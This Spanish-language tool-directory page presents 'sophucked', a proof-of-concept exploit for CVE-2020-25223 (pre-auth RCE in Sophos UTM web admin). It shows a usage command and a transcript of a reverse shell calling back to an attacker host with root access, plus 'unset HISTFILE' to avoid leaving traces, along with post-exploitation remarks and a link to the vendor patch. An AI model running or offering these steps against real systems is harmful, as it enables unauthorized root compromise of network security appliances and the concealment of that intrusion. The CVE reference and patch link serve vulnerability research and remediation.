Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
sophucked — Prueba de concepto del exploit para CVE-2020-25223 (RCE sin autenticación en la administración web de Sophos UTM) que entrega una reverse shell. Incluye notas de post-explotación y guía de detección. | Kitploit
Herramientas/GitHubGitHub/darrenmartyn/sophucked
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubdarrenmartyn/sophucked

sophucked

Prueba de concepto del exploit para CVE-2020-25223 (RCE sin autenticación en la administración web de Sophos UTM) que entrega una reverse shell. Incluye notas de post-explotación y guía de detección.

Ver Repositorio
1112hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

sophucked

CVE-2020-25223 RCE PoC, obtiene una reverse shell. Pre-auth. Lo implementé rápidamente porque se necesitaba para unificar algunos imanes de amenazas.

Uso de ejemplo:

root@kitploit:~
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
# 

Escaneo/Detección

No está implementado aquí, solo usa la plantilla de nuclei.

Notas de post-explotación

Estos tienen un intérprete de Python y, de hecho, un entorno Linux muy completo disponible. Potencial asombroso para la post-explotación.

Notas para el equipo azul

Seguro que alguien a quien le importe puede completar esto. Bitter (un subconjunto del "twitter del equipo azul") probablemente lo haga en breve. Quiero decir, no puede ser tan difícil detectar una reverse shell sin cifrar que sale de tu caja Unified Threat Manager, ¿verdad?

Arreglando el fallo

Alguien (presumiblemente de Sophos) envió esto, es el enlace oficial de la corrección. Ve a actualizar tu UTM. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce

Referencias, etc.

Referencia de terceros (detalles del fallo): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

Quejas directas a Sophos, que de algún modo pensó que pasar la entrada del usuario a open() en Perl era una buena idea en el siglo XXI.

Descargar herramienta